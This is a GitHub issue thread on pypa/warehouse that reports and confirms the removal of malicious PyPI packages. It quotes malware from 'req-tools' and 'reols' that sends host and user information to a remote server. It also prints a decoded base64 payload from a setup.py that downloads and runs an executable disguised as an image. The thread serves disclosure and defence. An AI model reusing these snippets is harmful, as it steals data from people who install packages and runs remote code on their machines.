### ISSUE TITLE
Malware packages on PyPI

### ISSUE THREAD

**Issue by honglei** [pypa/warehouse#7195]
Those projects will steal user information when user import them:

req-tools
reols

```python
# strHost = ""
strHost = socket.gethostbyname("securedmaininfo5.zapto.org")
intPort = 3000
def server_connect():
    global objSocket
    while True:  # infinite loop until socket can connect
        try:
            objSocket = socket.socket()
            objSocket.connect((strHost, intPort))
        except socket.error:
            time.sleep(5)  # wait 5 seconds to try again
        else: break

    strUserInfo = socket.gethostname() + "`," + platform.system() + " " + platform.release() + detectSandboxie() + detectVM() + \
                  "`," + os.environ["USERNAME"]
    send(str.encode(strUserInfo))
```
https://segmentfault.com/a/1190000021515378
https://www.secrss.com/articles/16205

**Comment by ewdurbin** [comment]
The reported projects are:
  - https://pypi.org/p/req-tools/
  - https://pypi.org/p/reols/
  - https://pypi.org/p/dark-magic/

I was able to confirm that `req-tools` and `reols` indeed contain the exfiltration code and they have been removed along with another project `reqtools25` uploaded by the same user.

`dark-magic` version 0.1.2 contains a snippet at the very bottom of `setup.py` that decodes a base64 string and calls exec on the following (formatted for clarity):

```python
import urllib.request     ;         
import os     ;         
import tempfile     ;         
if os.name == 'nt':     ;         
u = 'http://somwhereinrussia.ru/win/kitten.jpg'     ;         
d = '{0}\kitten.exe'.format(tempfile.gettempdir())     ;         
urllib.request.urlretrieve(u        ,         d)     ;         
os.startfile(d)
```

This project has also been removed.
